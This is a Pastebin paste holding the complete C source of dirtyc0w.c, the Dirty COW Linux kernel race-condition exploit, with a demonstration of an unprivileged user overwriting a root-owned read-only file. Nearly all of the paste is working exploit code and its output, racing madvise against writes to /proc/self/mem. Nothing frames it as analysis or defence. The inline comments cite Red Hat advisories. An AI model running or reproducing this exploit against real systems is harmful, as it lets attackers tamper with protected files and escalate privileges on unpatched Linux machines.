SHARE
TWEET

Untitled

a guest Oct 21st, 2016 66 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
  2.  
  3. /*
  4. ####################### dirtyc0w.c #######################
  5. $ sudo -s
  6. # echo this is not a test > foo
  7. # chmod 0404 foo
  8. $ ls -lah foo
  9. -r-----r-- 1 root root 19 Oct 20 15:23 foo
  10. $ cat foo
  11. this is not a test
  12. $ gcc -lpthread dirtyc0w.c -o dirtyc0w
  13. $ ./dirtyc0w foo m00000000000000000
  14. mmap 56123000
  15. madvise 0
  16. procselfmem 1800000000
  17. $ cat foo
  18. m00000000000000000
  19. ####################### dirtyc0w.c #######################
  20. */
  21. #include <stdio.h>
  22. #include <sys/mman.h>
  23. #include <fcntl.h>
  24. #include <pthread.h>
  25. #include <string.h>
  26.  
  27. void *map;
  28. int f;
  29. struct stat st;
  30. char *name;
  31.  
  32. void *madviseThread(void *arg)
  33. {
  34.   char *str;
  35.   str=(char*)arg;
  36.   int i,c=0;
  37.   for(i=0;i<100000000;i++)
  38.   {
  39. /*
  40. You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
  41. > This is achieved by racing the madvise(MADV_DONTNEED) system call
  42. > while having the page of the executable mmapped in memory.
  43. */
  44.     c+=madvise(map,100,MADV_DONTNEED);
  45.   }
  46.   printf("madvise %d\n\n",c);
  47. }
  48.  
  49. void *procselfmemThread(void *arg)
  50. {
  51.   char *str;
  52.   str=(char*)arg;
  53. /*
  54. You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
  55. >  The in the wild exploit we are aware of doesn't work on Red Hat
  56. >  Enterprise Linux 5 and 6 out of the box because on one side of
  57. >  the race it writes to /proc/self/mem, but /proc/self/mem is not
  58. >  writable on Red Hat Enterprise Linux 5 and 6.
  59. */
  60.   int f=open("/proc/self/mem",O_RDWR);
  61.   int i,c=0;
  62.   for(i=0;i<100000000;i++) {
  63. /*
  64. You have to reset the file pointer to the memory position.
  65. */
  66.     lseek(f,map,SEEK_SET);
  67.     c+=write(f,str,strlen(str));
  68.   }
  69.   printf("procselfmem %d\n\n", c);
  70. }
  71.  
  72.  
  73. int main(int argc,char *argv[])
  74. {
  75. /*
  76. You have to pass two arguments. File and Contents.
  77. */
  78.   if (argc<3)return 1;
  79.   pthread_t pth1,pth2;
  80. /*
  81. You have to open the file in read only mode.
  82. */
  83.   f=open(argv[1],O_RDONLY);
  84.   fstat(f,&st);
  85.   name=argv[1];
  86. /*
  87. You have to use MAP_PRIVATE for copy-on-write mapping.
  88. > Create a private copy-on-write mapping.  Updates to the
  89. > mapping are not visible to other processes mapping the same
  90. > file, and are not carried through to the underlying file.  It
  91. > is unspecified whether changes made to the file after the
  92. > mmap() call are visible in the mapped region.
  93. */
  94. /*
  95. You have to open with PROT_READ.
  96. */
  97.   map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  98.   printf("mmap %x\n\n",map);
  99. /*
  100. You have to do it on two threads.
  101. */
  102.   pthread_create(&pth1,NULL,madviseThread,argv[1]);
  103.   pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
  104. /*
  105. You have to wait for the threads to finish.
  106. */
  107.   pthread_join(pth1,NULL);
  108.   pthread_join(pth2,NULL);
  109.   return 0;
  110. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top